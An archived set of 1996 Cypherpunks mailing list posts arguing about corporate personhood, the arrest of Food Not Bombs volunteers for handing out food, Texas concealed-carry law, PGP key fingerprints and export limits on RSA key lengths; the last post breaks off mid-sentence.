> Date: Sat, 3 Aug 1996 01:06:55 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> To: "Timothy C. May" <tcmay@got.net>
> cc: cypherpunks@toad.com
> Subject: Re: SOUP KITCHENS (fwd)
> In-Reply-To: <ae28119a020210049840@[205.199.118.202]>
> Message-ID: <Pine.SV4.3.91.960803010515.1359F-100000@larry.infi.net>
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> We must always look at the legal definition of words. If I _give_ a 
> joint, I can be charged with sale of a controlled substance. That no 
> money changed hands is irrelevant.
> 

Wrong, you can be charged with distribution, not sales.

                                              Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 14:43:36 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: VISA Travel Money
In-Reply-To: <3202AC0F.41C6@ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960803004729.1359D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Where does one buy these Visa debit cards. Great idea for travel in the
Philippines, where ATM's are widespread but Travellors checks are not very
negotiable. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 14:53:41 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030308.WAA11470@einstein>
Message-ID: <Pine.SV4.3.91.960803005947.1359E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Corporations are state-created persons [legal definition of "person", not
colloquial vernacular]. They have some privileges which have surface 
resmblence to the rights of natural people. For example, they can "have 
standing" in a court to initiate a legal proceeding - in their own name, 
not that of an agent or employee or trustee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 14:57:21 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: SOUP KITCHENS (fwd)
In-Reply-To: <ae28119a020210049840@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960803010515.1359F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


We must always look at the legal definition of words. If I _give_ a 
joint, I can be charged with sale of a controlled substance. That no 
money changed hands is irrelevant.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 14:57:24 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: "adjust your attitude with their billy club" (fwd)
In-Reply-To: <199608030343.WAA11512@einstein>
Message-ID: <Pine.SV4.3.91.960803010945.1359H-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 2 Aug 1996, Jim Choate wrote:

> But it is your problem because 'your' side is aging and my generation is just
> now coming into power (ie eligable to run for president and such). With a


Why am I having these flashbacks to the Clinton Campaign promises of 1992 
about there existing a young man who is a "New Democrat", a white house 
that will have the highest-ever level of ethics, etc, etc, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 15:52:27 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030617.BAA11822@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 22:05:06 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: A Libertine Question (fwd)
> 
> > And any insurance company with a whit of sense would charge you rates so
> > high that your much touted small vendors and many of the medium sized
> > vendors currently in business would not exist. You think governments are
> > bad? Wait till you see a bunch of bean counters racing a profit margin. In
> > such a situation we wouldn't even have the opportunity for input into the
> > system via constitutions, charters, and votes. Just imagine how much support
> > a Japanese insurance company would provide its clients in regards to the
> > current epidemic in Japan, absolutely none because it is better the little
> > vendor go out of business than the insurance company.
> 
> Apparently Jim does not understand that the "race for profit 
> margin" is what LOWERS the prices of goods and services.  You 
> might check out HUMAN ACTION by von Mises.  Anyway, as I said in 
> my previous post.

Really? Then would you mind explaining why costs rise over time instead of
going down? Compare the cost of almost anything over time and what happens?
The price goes up. Insurance has become involved in the medical industry,
what happened? The cost has gone through the roof. The airplane industry was
deregulated in the late 70's, what happened? The price of a ticket went up
and more and more airlines went out of business because of lagging sales. In
many states (such as Texas) insurance was made mandatory, what happened? The
cost of automobile insurance went up.  The telephone companies were broken
up and 'privatized' in the 80's and what happened? The cost of phone service
has gone up and the rate of new service introduction has gone down. In
almost any case you care to mention where a monopoly or near-monopoly market
exists and is deregulated the cost of operation has gone up.

> > > It would be nice if businesses were offered that choice
> 
> I'm confident that the market solution would be far cheaper and
> less violent they injecting the coercive state apparatus into a
> volutary transactions between PEOPLE.

If this is so then by your own argument, business are operated by people
therefor they are people, the government should conform to this model since
it is operated by people also (by your argument). Therefore governments have
rights (clearly incorrect). Governments have duties and responsibilities,
under our Constitution the government is given no right. As a matter of fact
if there is a disagreement or unclear point the 10th says specificaly that
the government does not get to resolve it but rather the states or the
people. Clearly the founding fathers were drawing a distinction between the
people operating a system and the system itself.

> > I own 2 businesses...none are equivalent to my person. 
> 
> So?  They are owned and operated by people.

Yes, but they are not people any more than my ownership and operation of my
motor vehicle makes it a person. Is your contention that because I own and
operate a computer it should be given rights?

This is sorta funny, I can see it now...

"Your honor we would like to call Mr. Choate's 1985 Mustang to the stand to
give testimony."

"Mr. Choate's 1986 Mustang, you have been found guilty of speeding and
reckless driving."

Hey, come to think of it, this would make a great defence for many things.

"But your honor, my automobile has rights and is considered a person,
therefore you can't hold me responsible for running over those six nuns and
two infants. I was simply along for the ride. The only reason that I was in
the vehicle was that I was afraid to open the door and jump at 120 MPH."

Yup, I definately like where this is going...

I can see a cop reading my computer it's Miranda and waiting till Hell
freezes over for a positive responce.

Just think, all those dead cars...er persons...in the auto...er
people-crusher... We should bring those monsters up on charges for killing
people. Talk about mass murder.

> > Businesses are a system of rules and procedures...
> 
> Made and enforced by PEOPLE.  Jim is begging the question.

Which question would that be? "Should businesses be considered people with
the same rights and priviliges?" If so then it is clearly a negative answer.
The Constitution does not accept that premise and the law does not accept
that premise. If a business is found guilty of wrong doing do they put it in
jail? No, they put the persons involved in jail. Clearly the courts are
drawing a distinction between a system and those who operate it. Does the
constitution ever mention business or commercial enterprise in equality with
persons? Does this equality mean that I need to go the courthouse and get a
DBA in order to legaly exist in Texas as a business must?

Consider my dog, Reef, she is owned and operated by a person (I feed her,
walk her, clean up her messes, teach her tricks, even kill her if I choose -
though I can't be cruel to her) does this mean she is a person?

Sounds like the original proposition, that businesses should be awarded the
same rights as people because they are owned and operated by people, is a
reduction to absurtity.

> > Would you seriously give my dog a vote?
> 
> Gee, I don't know your dog.  His understanding of economics
> couldn't be much more rudimentary.  (Okay, it was a cheap
> shot, but it was a silly question.)

If I may, I would like to use a quote from the Transformers movie,

"You obviously don't understand the situation then."

Tata.

                                                Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 16:15:33 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: SOUP KITCHENS (fwd)
In-Reply-To: <v02120d0fae28834ebce8@[192.0.2.1]>
Message-ID: <Pine.SV4.3.91.960803011939.6572A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> The feeding was never the real issue. The heavy political indoctrination
> that came with it was. Patrick McHenry handed out the food, screaming in a
> mi[crophone of an amplified public address system]

If this isn't disturbing the peace, I don't know what is.

Patrick McHenry wasn't interested in the homeless, _for their sake_.  He 
was using them as a pawn to act out his own neurotic vision of "social 
activism".  If there hadn't been any homeless in the city, Patrick 
McHenry would have latched onto some other - any other - issue. It's the 
screaming into the microphone that he wants.

   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 19:13:57 +0800
To: wb8foz@nrk.com
Subject: Re: "And who shall guard the guardians?"
Message-ID: <199608030923.CAA22990@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 8/2/96 -0400, David Lesher wrote:
>> The English-Only bill just passed in the House bans the use of
>> non-English languages by government officials.  Does Tim's sudden 
>> avoidance of the Latin mean that _he_'s the Fed??  
>
>What about Navajo?

Foreign diplomacy was one of the exceptions.

Algol wasn't, since it's designed to describe algorithms to humans,
even though it's additionally useful for diplomatic relations with
our Mechanical Companions.  (Actually, they are allowed to use it
for teaching purposes, or if really necessary for National Security,
and the Bureau of the Census can use it to help count people.)

Section (I), however, is disappointing - means we can't sue them for
putting "E Pluribus Unum" on the coinage....

============================
`(2) OFFICIAL BUSINESS- The term `official business' means governmental actions,
          documents, or policies which are enforceable with the full weight
and authority of the Federal
          Government, and includes publications, income tax forms, and
informational materials, but
          does not include--
               `(A) teaching of languages;
               `(B) requirements under the Individuals with Disabilities
Education Act;
               `(C) actions, documents, or policies necessary for--
                    `(i) national security issues; or
                    `(ii) international relations, trade, or commerce;
               `(D) actions or documents that protect the public health and
safety;
               `(E) actions or documents that facilitate the activities of
the Bureau of the Census in
               compiling any census of population;
               `(F) actions, documents, or policies that are not enforceable
in the United States;
                (G) actions that protect the rights of victims of crimes or
criminal defendants;
               `(H) actions in which the United States has initiated a civil
lawsuit; or
               `(I) using terms of art or phrases from languages other than
English.
===================================================
"These aren't the droids you're looking for."
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sat, 3 Aug 1996 16:31:37 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: A Libertine Question (fwd)
In-Reply-To: <199608030542.AAA11740@einstein>
Message-ID: <Pine.SV4.3.91.960803023257.9798D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> I am not even shure I accept the legal premise of corporations.
 - Jim Choate


    This is NOT a drill. This is an actual pop quiz, in which Jim Choate 
is directed to tell us about the legal premise of incorporation. Jim, do 
you know anything about what you are talking about. Looking it up is not 
allowed.

P.S.  could you humor me on one tiny little thing?  Can we agree that 
that the word shall be spelled "sure", not "shure", on this list?  I 
don't want to trample on your artistic vision or anything like that, but 
could we just agree on this one tiny little thing




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 17:16:45 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance (fwd)
Message-ID: <199608030750.CAA11930@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Because none of these issues have ever been tested in a court of law any
comments I or any other person makes (even if a lawyer) is simply personal
opinion. To find out what is 'really' going on we will have to simply wait
for that first case.

Forwarded message:

> Date: Fri, 2 Aug 1996 22:28:37 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> Subject: Re: Tolerance (fwd)
> 
> A.  Where does Jim get the terms of the contract he implies from
>     the simple word "public"?  As far as I can see, he simply made
>     it up from whole cloth.  Interesting, but totally without any
>     legal basis.

Public - 

of or pertaining to the people; not private or secret; open to general use;
accessible to all; serving the people. Community or its members; a section
of community. Making known to the public; proclamation; printing in a book,
etc. for sale or distribution. To make widely known; to advertise. The state
of being generaly known; notoriety; advertisement.

I first learned about the cpunks list in Mondo 2000 several years ago not
long after I got PGP 1.0 off Adelante BBS in Co. Wasn't Eric's girlfriend
involved in Mondo 2000? (Hi Jude, I think we will have a RoboFest this year
in Austin, as always you are invited) Which would indicate a certain level of
premeditation regarding letting people know of the list. I think that qualifies
as public, I also think a court would accept that argument. The bottem line is
that the list operator crossed that line whether they were aware of it or not.
If they feel uncomfortable with this then they should consider very strongly
dropping the list or enacting some form of registration more preferential
than majordomo's subscribe system. This registration should clearly define
what is and is not allowed on this list.

> B.  I'm unaware that the Cypherpunks list has ever been advertised
>     as "public" by the list owner.

It has appeared in many publications which are intended for general or
'public' distribution in every one of those publications it was made clear
that anyone was welcome and the subscription address was provided. The list
operators ignorance of the consequences of their actions in no way alleviates
them of the consequences of those actions.

> C.  Combining A & B, I know of know instance where the owners of
>     the Cypherpunks list ever made any indication that they were
>     adhearing to the Byzantine interpretation of contract law as
>     suggested by Jim.  (It sure doesn't comport to what I learned
>     in my Contracts classes.)

It isn't my interpretation. Perhaps you should have paid better attention in
class. These issues have never been tested in a court of law in the US in
regards to computer networks and their special nature.

> > > A restaurant or bookstore is a public place in that it is open
> > > to the public.
> > 
> > I know of no state in the union where a bookstore, restaurant,
> > mall, etc. is considered public.
> 
> Actually, it's the law in ALL states in the union since the Public 
> Accomidations Act was enacted some time in the '60s (with the
> possible exception of Texas, I guess).

Not in Texas. We recently passed a law (Jan. 8) which permits citizens legaly
registered to carry concealed weapons. Because the way the law was worded it
was made clear in many newspapers and such that the ONLY way that business
could prohibit patrons from entering their premises with those weapons was
because they were PRIVATE property and therefore excluded from the
constraints of the law. [When I worked at UT the rationale that was used to
throw the dumpster divers off campus was that even though it was a publicly
funded school by taxes it was private property (didn't make sense to  me
then or now). I can also state unequivacly that if the UTPD catch you on
campus after 10pm or before 6AM w/o proof of either being a current student
or staff consider it a graceful and considerate officer if they only escort
you off campus.] Even now there is a big discussion here over whether
this is realy a strong enough distinction. It is only a matter of time
before a case comes up here to test even this limitation of private
ownership (which I happen to support, a person with a gun on my private
property is definately subject to my desires and wants, they represent a
clear and present danger. If they don't then why do they need to register
the weapons and why are they classed 'deadly weapons'?). The really sad part
is that it will probably be another one of those shoot outs at Wendy's in
Waco or some such nonesense as some loony toon goes postal. I wonder if that
was what Jeffeson meant about watering the tree of liberty with blood? If my
business property is really public simply because I am open to the public
then I feel the police have a responsibility to provide an officer on my
premises for whatever hours I am open for business to protect me, my property, and my
patrons just like they do at the courthouse, tax accessors office, etc. They
also have a responsibility to help assist in the operation and funding of my
business (something I oppose strongly) since they have now found my business
to be public; as a matter of fact they can help pay my damn taxes.

For the record Florida and every other state with 'Right To Carry' laws
looks at it this way. It is the only way under the current statutes to
allow businesses to control access by gun toting folks.

Now there is one caveat that most of you will have caught. That is the
definitions of public above. In short, we have a circular argument as the law
is worded now. Logicaly the courts have two recourses. They can first
declare that no agency has the right to regulate gun ownership and
possession (what I want to see) or else regardless of the 2nd, nobody has
the right to carry a weapon on their person in public, since police are not
awarded special consideration from constitutional law this would mean they
could not carry a weapon on their side in public. So the courts eventualy
must either refuse to review the case or else they must make some major
change in the current law which goes against the government either way.
Either everyone gets to wear weapons or nobody including the police get to
carry them. Either way with the last two the police are in a situation where
they are less likely to employ force for enforcement since they are no longer
the strong side in the 'discussion'.

> > Legaly a public place is someplace which is operated using
> > public monies.
> 
> Like the Cypherpunks list?  Citation, please.

The Cpunks list isn't a place. It is a steam of characters. Does the list
reside on my computer? It does at least to some degree since I obviously
have access to discuss these issues with you. It also resides on your
computer as well as the thousand or so subscribers. It resides at least in
part on the screen of my crt, the RAM in my computer, the network cable, the 
ISDN line, my providers router, my brain, the EM emission of the computer,
etc. ad nauseum. So there is no single 'place' where the list resides, any
more than a single place that an idea resides. This whole issue is the reason
that I contend that eventualy it will be seen clearly that postings on usenet,
public accessible mailing lists, irc channels, etc. are actualy automaticaly
public domain in regards to their content. At some point I feel that it will
turn out that unless you encrypt your data or place copyright symbols on it
with special, and likely convoluted, riders allowing various distributions
and storing via computer networks the author of computer text such as this
will grant all rights and privileges to the work to the public automaticaly.
This belief is the reason that I am interested in crypto, outside the simple
curiosity I have about nature.

I don't believe the cpunks list has ever been involved in a legal case. As a
matter of fact this issue has never been tested in a court of law. Perhaps
we should look at forcing a case. The best strategy would be for Eric to
throw somebody off the list sureptitously (sp? I put the dictionaries back and
I ain't walking over there again...sorry) and then for that person to bring
a civil suit alleging infringement of civil liberties (ie equal access under
the law). Eric would claim the list is private while the expunged user would
claim it was public. We would of course have to resolve the cost issue first.
I have two lawyers on retainer for my businesses but I don't believe either
would touch a non-commerical case like this would be and I don't have
anywhere near the personal capital to finance it myself. As a added bonus we
could pick a handicapped person and they could sue under the various laws
relating to those issues as well. This would get the whole issue of
handicapped access to computer technology to be explored. Currently the
handicapped (eg blind) find GUI interfaces nearly unusable. It would be
pretty weird (to me) to see court rule that every os and software
manufacturer must provide a CLI interface to their products because of the
new equal access laws regarding handicapped individuals.

> The problem with Jim is not that he doesn't know anything, but
> rather that he knows so many things that aren't true.  (But I
> would not favor enforcing the state granted monopoly on the
> practice of law if Jim wants to hang out his shingle.  If he can
> get someone to pay him for legal advice, more power to him, but 
> /caveat emptor/.)

That is a two edged sword. Where did you get your law degree? My lawyers
both got theirs at UT Austin Law School. Both are federal lawyers and both
have argued before the Supreme and are currently allowed to argue before the
Supremes.

The bottem line is that this whole issue is so full of circular arguments
and contrary views it may take quite a few years to work out something that
makes any kind of sense at all, if ever. Course by then we will have a whole
new generatio of technology to argue over.

Take care all, and watch your sixes.

                                                     Jim Choate







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 19:35:35 +0800
To: Paul Wittry <ppw3@everett.com>
Subject: Re: Why Fingerprints and Key-ID's
Message-ID: <199608030959.CAA23261@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:42 PM 8/2/96 -0700, Paul Wittry <ppw3@everett.com> wrote:
>I understand PGP Open-Signed messages and why they are used. I've 
>read all the FAQ's. I can't seem to figure out why some of us put our 
>Fingerprints and/or Key-ID's at the end of messages.

Even with the PGP Web Of Trust, one of the difficult problems
in cryptography is how to do key distribution - if you want to
talk to Bob, how do you know you've really got _Bob's_ key
instead of a key some imposter Eve _said_ was Bob's key?
Similarly, if you receive a message saying "Bank X will pay
you $Y, signed Bank X Small-Transactions-Teller", 
how do you know it really came from them and wasn't signed
by some fake key that Carol genned up?  
One way is to get some well-known person to sign your key,
or a chain of people which get you to a sig for the key you want.

Another way is to give out your key, often.  That way someone
who gets email from "you", signed by "your" key, can compare
the key with previous keys you've stuck on your email and
business cards, and scream if there's a mismatch.
For this, remember to use the full key fingerprint, not just
the short KeyID which can be duplicated arbitrarily.
This is especially useful for pseudonymous people like
Black Unicorn.

Another reason is just to remind people you've got a PGP key
and make it easier to look up 0x12345678 correctly than
"Joe Anonymous" or "smith".
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 3 Aug 1996 20:02:53 +0800
To: cypherpunks@toad.com
Subject: Re: strength of 128-bit encryption?
Message-ID: <199608031017.DAA23426@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:38 AM 8/2/96 -0400, KDBriggs1@aol.com wrote:
><< Current export standards allow export of 512-bit RSA for encrypting
> (including key exchange), 1024 bit for signing. >>
>1024-bit for signing?  Do you have a reference for this?  I was under the
>impression that digital signatures were not covered by export restrictions.

I've heard this also, but remember that the export standards are
"whatever specific products we decide you can export" rather than a
formal law you can design to and be sure they'll obey.

The ITAR doesn't cover pure authentication software, only software
capable of preserving privacy through encryption.  Some public-key
signature algorithms only do signature, some only do privacy,
RSA does both.  Thus, especially for software like Netscape which
_does_ have encryption capabilities, they can get away with limiting
the strength of the RSA signature portion because it's part of the
encryption package, and because RSA signing is just encrypting with
your private key instead of your public key.  Someone _could_ use
an RSA signature program to encrypt short data (like keys)
if they wanted to work at it, and while bugs in software are of course
entirely unheard of that would make this easier, there's still the
risk that those Crafty Furriners might disassemble the crypto code
from Netscape and reassemble it with the limits removed.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 3 Aug 1996 19:00:27 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030921.EAA12012@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 03 Aug 1996 00:18:38 -0700
> From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
> Subject: Re: A Libertine Question (fwd)
> 
> I disagree with your sentiments about Business and rights, however, in this
> instance, even that wasn't the issue. Food Not Bombs is NOT a business, it's
> a not-for-profit organization that gives out (not sells) food.  They are the
> same as, I think Tim May pointed out, a Boy Scout picnic, except for the 
> homless, not the boy scouts.

Then we have a clear case of abuse of power and if the folks at FNB don't
pursue this then they deserve the ignominy they receive. What is the current
status? Have counter suites been filed? What was the ACLU and NAACP (I am
assuming that everyone at FNB is not anglo-saxon and named 'Fletcher')
responce to requests for aid? Have they begun a petition or whatever the
city charter allows demanding the ouster of those in charge? What is the
Libertarian Party there doing? Has anyone contacted the Justice Dept. and
begun the proceeding for a civil rights suit? If these folks seriously went
out there not prepared to fight then the issues must not be very important to
them, perhaps a simple publicity stunt to get their 15 minutes and not realy
to help the homeless/foodless? Has anyone made reference to the judges
comments in the CDA trial regarding speech and chaos?

While the city acted illegaly, nobody has stated if the city categoricaly
prohibits such activities which was the point I was originaly trying to
express. Was this a isolated incident originating with the poor decision of
a single individual in the HD or was it organized? Have similar responces
occured before?

Every year on Halloween a bunch of folks here in Texas go down to the State
Capital at about 10pm and sit around and smoke pot for about an hour. The
city police have no jurisdiction on the capital grounds and the DPS officers
pretty much stand around and make shure things don't get out of hand. I have
never known of anyone being arrested but then again the place is crawling
with video and lawyers ready to pounce. I would contend that one of the
reasons that no actions are taken is that the event is organized and the
folks come prepared to go to jail and fight if need be.


                                               Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 3 Aug 1996 19:16:44 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608030957.EAA12053@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 3 Aug 1996 02:38:09 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: A Libertine Question (fwd)
> 
> > I am not even shure I accept the legal premise of corporations.
>  - Jim Choate
> 
>     This is NOT a drill.

Right, petty harrasment would better describe it.

> This is an actual pop quiz, in which Jim Choate 
> is directed to tell us about the legal premise of incorporation. Jim, do 
> you know anything about what you are talking about. Looking it up is not 
> allowed.

Why should I be prohibited from looking it up? You had to in order to grasp
the concept originaly? Doesn't really matter since I already have done it
with LSD Labs. The concept behind incorporation is to create a commercial
entity whereby the  persons & possessions of the principles can be
protected from most legal actions against the corporation. The fictional
rights given the corporation is intended to create a framework whereby the
existing legal structure can be applied fairly to the business that the
corporation carries out. In the case of a single proprietorship such as
CyberTects it is possible for me to loose everything I own if the right
conditions arise (eg I got sued and lose) in order to pay the judgement.
It is much harder for me to loose monies and physical property being
involved in a incorporated venture.

The reason that I oppose this is the same reason that I oppose the laws that
prevent suing the government without their permission. It creates an
atmosphere of isolation that gives petty non-elected government prols the
feeling of invincibility and isolation. It's just their job, never mind they
are fucking peoples lives over. It is the reason that big companies screw up
time and time again and still manage to survive and do it to us again.

So what do I win other than a hard time?

> P.S.  could you humor me on one tiny little thing?  Can we agree that 
> that the word shall be spelled "sure", not "shure", on this list?  I 
> don't want to trample on your artistic vision or anything like that, but 
> could we just agree on this one tiny little thing

So fucking sue me for learning to read/write phoneticaly. Geesh what a petty
attitude. Do you feel better now? Is your sense of superiority restored?
If the only criticism you have is my spelling then shut the fuck up. If it
makes you feel any better I am very hyper-active and dyslexic as well. But
that is ok, there are people that love me anyway.


                                                Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 3 Aug 1996 20:42:40 +0800
To: cypherpunks@toad.com
Subject: Re: SOUP KITCHENS (fwd)
Message-ID: <199608031110.GAA12116@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 20:12:04 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: SOUP KITCHENS (fwd)
> 
> >True enough, but not the whole story. If a dog or cat is kept well and fed
> >good quality food they live 10+ years. The average life of an animal on the
> >street is between 2-5 years. As to people, we now live around 75-80 years,
> >prior to all these rules and regulations on food and such the average was
> >20-25. If we go back to what you propose you would be dead a long time ago.
> 
> Hardly a proved correlation. A lot of other factors come into play. But
> never mind. No point arguing.

But it is. I suggest you take a look at any social health text and look at
the comparisons between diets of our ancestors, ourselves, and various
cultures around the planet now. In places like Africa the mean age in many
places is still in the early 20's. It is pretty remarkable that places that
at one time had poor or subsistance diets and now have more modern diets
have the average life span growing (even in places like Samoa and the Pima
Indians in Mexico and the S. US where the high-fat diets are causinga marked
increase in coronary problems, interesting article in this months Sci-Am) by
leaps and bounds. Look at the studies which have tracked the English
population over the centuries (they kept good records) and compaired
physical body characteristics with food intake. It has been clearly shown
that as the food got better and more plentiful the lifespan got longer and
the average height got larger. Pretty strong evidence of some correlation
there. I certainly feel strongly enough about it that I would not willingly
eat food except in emergency conditions that I was not shure of the quality
or purity.

Other factors such as what? Disease? If you have a good diet then diseases
like colds and Influenza (for example) are survivable. Without good diets
high in Vitamen C and such you get Rickets and can die from a simple cold in
as little as 3 days. Certainly if you kill off the local fauna you will
increse your lifespan simply because there isn't as much to eat you when you
aren't looking. But this particular threat was most present for the older
and more damaged individuals. During some recent studies (5-6 years) of
Cromagnon Man it was discovered that these folks were covered in broken
bones, arthritic joints, spongy bones, spinabifida, etc. because of the hard
life they lived having to manualy chase down the dinner and kill up close
with rocks and sticks. If you get a chance try to get a peek at some of the
pictures. I remember one of a girl around 16 whose knees and back looked
like they belonged to somebody 80 years old.

If you feel there is no point in arguing (which I don't feel we are doing
since it seems pretty civil, we have widely seperate views) why resond?
That is like asking somebody a person question and then when getting the
answer saying you don't care. Just for the record, I am enjoying the
discourse. But since you are not I won't continue this thread any longer.

> >I personaly find it reassuring that some bunch of knuckle-heads are unable
> >to start a chip making facility like you support. The thought of finding
> >flourine compounds in the local river (where I get my tap water) or simply
> >dumped in the air is a little unsettling. Just because some group of bozo's
> >want to start a business is not sufficient justification for that to be
> >allowed.
> 
> A straw man. There is is no evidence that these startup companies are
> dumping stuff in rivers. Jeesh. The point is that large companies learn how
> to keep large staffs employed filling out paperwork, and they actually have
> come to see it is a good way to keep small companies from forming.

A straw man is where one claims one situation is analgous to another
different situation. This is not a straw man because we are talking about
the same issue but discussing the effect of size on behaviour.

Motorola, AMD, Sematech, etc. have all been fined over the last years for
doing just this to the waters around Austin. When I was working at Austin
Community College over the last 2 1/2 years (prior to going to work for
Tivoli - IBM 4 months ago) my primary responsibility was building a wafer
fab training facility at the Riverside campus from donations from these
folks and many others localy (Applied Material, Varian, etc.) I got to spend
a lot of time in site in areas that normaly are not open to outsiders. If
these big plants have problems regulating their emissions with their budget
and reams of paper just image what a startup hard for cash would do if they
thought they could get away with it "just this one time". I think the way
Crystal Semiconductor (ie fabless) does their design is the way to go for
small startups, simply rent production facilities from these other
companies. I know that, for example, each of the companies here in Austin
are in the process of shutting down older fabs and don't have plans to
upgrade them for at least a couple of years. For somebody like Crystal that
is a god send. It means they can bring products to market for costs way
below what it would have originaly cost, and the larger company gets to
bring in income on equipment it had originaly written off. Sounds like a
win-win to me.

Sorry, but a simple reading of the Austin American Statesman (admittedly a
shitty paper very highly biased) will provide numerous instances of such
dumps over the last few years.

> >It seems to me that many of the folks who recognize downsized workers pleas
> >for their 'right to a job' as so much bunk are at the same time supporting a
> >businesses right to start up. A pretty humorous double standard.
> 
> Not at all comparable.

But they are for the simple reason that we are talking about two entities
which each claim a right to some behaviour. And in this case directly
comparable because a person working is comparable to a business working.
Each provides services and expects a return.

Now the argument goes with persons that a person does not have a inherent
right to income. In other words if a company shuts down and they are laid
off w/o any other work forthcoming it is their fault for not seeking the
appropriate training and such (ie resources) to get another job with a
better future.

Now with business the claim is that they should have some rights comparable
to persons, however they should also be given the right to open their doors
for business even if they can't demonstrate some level of competency and
ability to survive in the market. This is carried to the point that they
should be allowed to operate without regulation or other forms of checks and
balances on their actions.

Now if a real person does not have a right to income if they don't posses
the requisite skills why should a business be allowed to do it without
showing the same sort requisite skills? Why should the local community be
forced to take on the burden of such a venture simply because the business
is a 'virtual' person? It is becoming pretty clear with the change in
welfare (which I support) that our society does not feel an obligation to
support folks for more than 2-3 years on the social dole without some return
on investment. Why should the city be required to provide utilities and
other services without some assurance they will get the public funds (ie
your money and mine) back? We as citizens in Austin certainly don't recieve
stock or other benefit from this other than the jobs it creates for persons
with the requisite skill.

> >I have never heard of anyone being arrested for giving away food, only
> >selling it without a license. I bet the Salvation Army soup kitchen would be
> >worried if this claim were true (they aren't and it ain't).
> 
> Then you weren't reading the thread, which in several posts described this
> very situation. "Food Not Bombs" was giving away soup, chile, and other
> such stuff at a park in Santa Cruz (and maybe elsewhere, e.g., San
> Francisco). They were busted.
> Now do you understand the situation?

I understand that they were arrested for the noise and such and not for the
food. The reason that the permit was refused (wrongly I agree) was that the
HD did not want the people out on the street causing a disturbance.

What they did should be protected if it is in the right place and at the
right time. The right of the poeple to assemble has an important caveat.
If I may,

 
